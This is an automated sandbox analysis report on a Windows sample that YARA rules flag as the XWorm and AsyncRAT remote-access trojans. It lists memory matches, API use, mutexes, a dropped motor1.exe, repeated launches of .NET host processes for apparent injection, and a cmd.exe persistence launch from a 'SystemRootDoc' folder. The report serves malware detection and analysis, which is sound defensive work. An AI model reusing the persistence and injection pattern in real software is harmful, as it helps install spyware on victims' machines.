Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ll\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBpA

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@63/102@1/1

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFD946A1060 SetLastError,FormatMessageW,GetLastError,SetLastError,FormatMessageW,GetLastError,

4_2_00007FFD946A1060

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

File created: C:\Users\user\SystemRootDoc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\IwMAIz6YYiXAdbpb
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3924
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5448

Source: C:\Users\user\Desktop\pKxhpP0spW.exe

File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f

Jump to behavior

Source: pKxhpP0spW.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pKxhpP0spW.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pKxhpP0spW.exe

Virustotal: Detection: 9%

Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\OS\win\OsUtils_win.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\OS\win\FakeWindow.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\FileCache.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\MoveToTrash.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\DirectoryWatcher.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\Junction.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\DirectoryWatcher.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi/Fnd/RAII/Releasable.h

Source: C:\Users\user\Desktop\pKxhpP0spW.exe

File read: C:\Users\user\Desktop\pKxhpP0spW.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pKxhpP0spW.exe "C:\Users\user\Desktop\pKxhpP0spW.exe"
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 76
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 76
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: glog.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: boost_filesystem-mt-x64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: webuid.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndcrashhandler.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndnetworking.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndstring.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
